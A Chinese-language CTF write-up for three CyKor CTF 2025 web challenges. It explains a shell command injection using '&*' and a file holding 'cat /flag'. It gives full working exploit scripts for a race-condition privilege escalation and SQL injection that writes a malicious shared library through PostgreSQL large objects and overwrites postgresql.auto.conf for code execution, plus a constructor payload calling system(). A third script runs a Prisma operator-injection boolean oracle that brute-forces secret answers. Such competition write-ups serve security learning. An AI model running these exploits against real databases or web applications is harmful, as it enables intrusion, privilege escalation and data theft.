CyKor CTF 2025 Writeup
周末笔者边打 HITCTF 边打 CyKor CTF,属于是燃尽了。HITCTF 的 Writeup 先咕咕了,还有题目待复现。
Web
asterisk | 已解出
- 输入验证的时候允许 ASCII 码 ≤ 57 的字符通过,其中包含了& (38)、* (42)、' (39)、# (35)
- 我们的 input 直接拼接到 shell 命令中,没有任何过滤
const shell = `echo ${input} | node ../bin/mini-run.js --b64code '${b64code}'`;
- 当我们输入
&*时:- echo & → echo 在后台执行
- * → 展开为 ./users/ 目录下所有文件名
- 第一个文件名作为命令执行,其余作为参数
- 所以我们可以创建用户
sh和t,其中t的文件内容保存为cat /flag
dbchat | 已解出
register路由中,用户文件 (save_user) 是先保存的,但角色 (ROLE列表) 的插入是在一个模拟的耗时操作 (get_msg) 之后进行的。ROLE列表的顺序依赖于用户文件名的字母排序 (get_username_rank)。- 所以我们注册两个用户,
slow用户用时长,字典序小;fast用户用时短,字典序在slow和 admin 之间。- 当
fast完成时,计算出自己在文件列表中的排名 (Rank 1),并向ROLE列表索引 1 插入 'user'。此时ROLE为['admin', 'user']。 - 当
slow完成时,计算出自己在文件列表中的排名 (Rank 0),并向ROLE列表索引 0 插入 'user'。此时ROLE为['user', 'admin', 'user']。 - 此时
fast用户对应的ROLE[1]变成了 admin,提权成功。
- 当
- 获取 Admin 权限后,
/admin/chat接口存在 SQL 注入漏洞。后端直接将用户输入拼接到 SQL 查询中:SELECT ... FROM people WHERE name='{name}'; - 对于 PostgreSQL ,我们利用他的 Large Object 功能进行任意写。
- 首先上传一个恶意库,定义构造函数使其加载时复制 flag 到用户名目录。
- 再利用
lo_create,lowrite,lo_export写入.so文件 - 接着覆盖
postgresql.auto.conf,设置session_preload_libraries = '/app/users/exploit.so'。 - 用
pg_reload_conf()重载配置,然后发起新的数据库连接请求。这会触发 PostgreSQL 加载我们的恶意库并执行其中的命令。 - 最后读取所有用户名获得 flag。
Exp:
exploit.py:
import urllib.request
import urllib.parse
import json
import threading
import time
import string
import random
import binascii
BASE_URL = "http://54.180.15.185:8081/play/1tHfAID8C7ZcFopX8v7XCWmUudOzfapF"
def make_request(endpoint, data=None, headers=None, method='GET', cookie_jar=None):
url = f"{BASE_URL}{endpoint}"
if headers is None:
headers = {}
if data is not None:
json_data = json.dumps(data).encode('utf-8')
headers['Content-Type'] = 'application/json'
else:
json_data = None
if cookie_jar:
cookies = "; ".join([f"{k}={v}" for k,v in cookie_jar.items()])
headers['Cookie'] = cookies
start = time.time()
req = urllib.request.Request(url, data=json_data, headers=headers, method=method)
try:
with urllib.request.urlopen(req) as res:
response_body = res.read().decode('utf-8')
if res.getheader('Set-Cookie'):
cookie_header = res.getheader('Set-Cookie')
parts = cookie_header.split(';')
if cookie_jar is not None:
for part in parts:
if '=' in part:
k, v = part.strip().split('=', 1)
if k == 'session':
cookie_jar['session'] = v
duration = time.time() - start
try:
return duration, json.loads(response_body)
except:
return duration, response_body
except urllib.error.HTTPError as e:
duration = time.time() - start
try:
body = e.read().decode('utf-8')
return duration, json.loads(body)
except:
return duration, body
except Exception as e:
return 0, str(e)
def register(username, password):
duration, resp = make_request("/register", {
"username": username,
"password": password,
"confirm_password": password,
"role": "user"
}, method='POST')
def login(username, password):
cookie_jar = {}
duration, resp = make_request("/login", {
"username": username,
"password": password
}, method='POST', cookie_jar=cookie_jar)
if isinstance(resp, dict) and resp.get('success'):
return cookie_jar
return None
def check_admin(cookie_jar):
duration, resp = make_request("/admin", method='GET', cookie_jar=cookie_jar)
if "welcome to admin page" in str(resp):
return True
return False
def exploit_race():
for i in range(100):
suffix = str(random.randint(10000, 99999))
slow_user = "0" + suffix
fast_user = "1" + suffix[:2]
print(f"Attempting with Slow: {slow_user}, Fast: {fast_user}")
t1 = threading.Thread(target=register, args=(slow_user, "pass"))
t2 = threading.Thread(target=register, args=(fast_user, "pass"))
t1.start()
time.sleep(0.005)
t2.start()
t1.join()
t2.join()
cookies = login(fast_user, "pass")
if cookies:
if check_admin(cookies):
print(f"[+] Success! User {fast_user} is admin.")
return cookies
return None
def hex_encode(s):
return binascii.hexlify(s.encode()).decode()
if __name__ == "__main__":
cookies = exploit_race()
if cookies:
# 3-step Large Object upload
# 1. Create LO with specific OID
oid = random.randint(20000, 80000)
print(f"Using OID: {oid}")
payload = f"' UNION SELECT lo_create({oid})::text --"
question = f"what is name of {payload}"
print("Creating LO...")
make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
# 2. Write data to LO
try:
with open("exploit.so", "rb") as f:
so_content = f.read()
so_hex = so_content.hex()
except Exception as e:
print(f"Failed to read exploit.so: {e}")
exit(1)
# Let's try one big write first.
payload = f"' UNION SELECT lowrite(lo_open({oid}, 131072), decode('{so_hex}', 'hex'))::text --"
question = f"what is name of {payload}"
print("Writing data to LO...")
_, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
print(resp)
# 3. Export to file
payload = f"' UNION SELECT lo_export({oid}, '/app/users/exploit.so')::text --"
question = f"what is name of {payload}"
print("Exporting to /app/users/exploit.so...")
_, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
print(resp)
# Now same for postgresql.auto.conf
oid2 = oid + 1
print(f"Using OID2: {oid2}")
payload = f"' UNION SELECT lo_create({oid2})::text --"
question = f"what is name of {payload}"
print("Creating LO 2...")
make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
config_content = "session_preload_libraries = '/app/users/exploit.so'\n"
config_hex = hex_encode(config_content)
payload = f"' UNION SELECT lowrite(lo_open({oid2}, 131072), decode('{config_hex}', 'hex'))::text --"
question = f"what is name of {payload}"
print("Writing config to LO 2...")
make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
config_path = "/var/lib/postgresql/17/main/postgresql.auto.conf"
payload = f"' UNION SELECT lo_export({oid2}, '{config_path}')::text --"
question = f"what is name of {payload}"
print("Exporting config...")
_, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
print(resp)
# Reload config
payload = f"' UNION SELECT pg_reload_conf()::text --"
question = f"what is name of {payload}"
print("Reloading config...")
_, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
print(resp)
# Trigger
print("Triggering execution...")
make_request("/admin/chat", {"question": "trigger"}, method='POST', cookie_jar=cookies)
# Check users
time.sleep(1)
print("Checking users...")
_, users_list = make_request("/admin/users", method='GET', cookie_jar=cookies)
print(f"Users: {users_list}")
if "CyKor" in str(users_list):
print("FOUND FLAG!")
parts = str(users_list).split(", ")
for part in parts:
if "CyKor" in part:
print(f"Flag: {part}")
exploit.c:
#include <stdlib.h>
void __attribute__((constructor)) my_init() {
system("cp /app/users/admin.json /app/users/$(/app/flag).json");
}
flag checker | 已解出
User模型包含username(公开/可控)、answer(私密/目标)和stage/leaderboard接口接受 usernames 数组,并执行以下 Prisma 查询:
// src/index.ts
const where = !usernames || usernames.length === 0
? { stage: whereStage }
: {
AND: [
{
OR: usernames.map((username: string) => ({ username })), // 注入点
},
{ stage: whereStage },
],
};
const result = await prisma.user.findMany({ where, select: { id: true } });
- 直接拼接的 usernames 导致可以注入,我们可以构造
usernames: [{ "gt": { "_ref": "answer", "_container": "User" } }]来让 Prisma 将其翻译为 SQL 中的WHERE "username" > "answer",也即返回所有 username > answer 的 ID 列表。 - 此时我们完成了一个 Bool 类型的侧信道攻击,可以爆破 answer 了。
Exp:
import requests
import json
import sys
import time
import random
import string
BASE_URL = "http://3.37.112.26:3000"
USERNAME = "12312redsaf123"
PASSWORD = "password123"
CURRENT_PASSWORD = PASSWORD
ANSWER_REF = {"_ref":"answer","_container":"User"}
def register(username, password):
res = requests.post(f"{BASE_URL}/register", json={"username": username, "password": password})
return res.status_code == 200 or "Signup failed" in res.text
def login(username, password):
session = requests.Session()
res = session.post(f"{BASE_URL}/login", json={"username": username, "password": password})
if res.status_code != 200 or "failed" in res.text:
raise Exception("Login failed")
return session
def update_username(session, new_username, password):
payload = {
"username": new_username,
"password": password,
"oldPassword": password
}
time.sleep(0.1)
res = session.post(f"{BASE_URL}/update", json=payload)
if "successful" not in res.text:
return False
time.sleep(0.2)
return True
def get_my_id(session, username):
payload = {
"usernames": [{"equals": username}],
"stage": {"gte": 0}
}
res = session.post(f"{BASE_URL}/leaderboard", json=payload).json()
if "ids" in res and res["ids"]:
return res["ids"][0]
return None
def check_condition(session, stage, probe_username, my_id):
payload = {
"usernames": [{"gt": ANSWER_REF}],
"stage": {"equals": stage}
}
res = session.post(f"{BASE_URL}/leaderboard", json=payload)
try:
data = res.json()
if "ids" in data:
return my_id in data["ids"]
except:
pass
return False
def solve_stage(session, stage_num, my_id):
print(f"Solving Stage {stage_num}...")
known = "KyCor{"
charset = "0123456789abcdefg"
# Characters smaller than '0' (ASCII 48)
# '!' (33) to '/' (47)
safe_low_chars = "!#$%&'()*+,-./"
for i in range(16):
low = 0
high = 16
ans_idx = 16
while low <= high:
mid = (low + high) // 2
char_to_test = charset[mid]
# Construct probe with random suffix to avoid collision
suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(1, 5)))
probe = known + char_to_test + suffix
if not update_username(session, probe, CURRENT_PASSWORD):
print(f" [!] Collision for {probe}. Retrying with new suffix...")
suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(6, 10)))
probe = known + char_to_test + suffix
if not update_username(session, probe, CURRENT_PASSWORD):
raise Exception(f"Persistent collision for {probe}")
is_greater = check_condition(session, stage_num, probe, my_id)
if is_greater:
ans_idx = mid
high = mid - 1
else:
low = mid + 1
found_char = charset[ans_idx - 1]
known += found_char
print(f" Found char {i+1}/16: {found_char} -> {known}")
final_answer = known + "}"
print(f"Stage {stage_num} Answer: {final_answer}")
res = session.post(f"{BASE_URL}/answer", json={"answer": final_answer})
print(f"Submit: {res.text}")
time.sleep(0.5)
if "Answer correct" in res.text:
return True
elif "CyKor{" in res.text:
print(f"FLAG FOUND: {res.json()['message']}")
return True
else:
print("Something went wrong.")
return False
def main():
register(USERNAME, PASSWORD)
session = login(USERNAME, PASSWORD)
my_id = get_my_id(session, USERNAME)
print(f"My ID: {my_id}")
if not my_id:
print("Could not find my ID.")
return
current_stage = 0
while current_stage <= 9:
success = solve_stage(session, current_stage, my_id)
if not success:
break
if current_stage == 9:
break
current_stage += 1
if __name__ == "__main__":
main()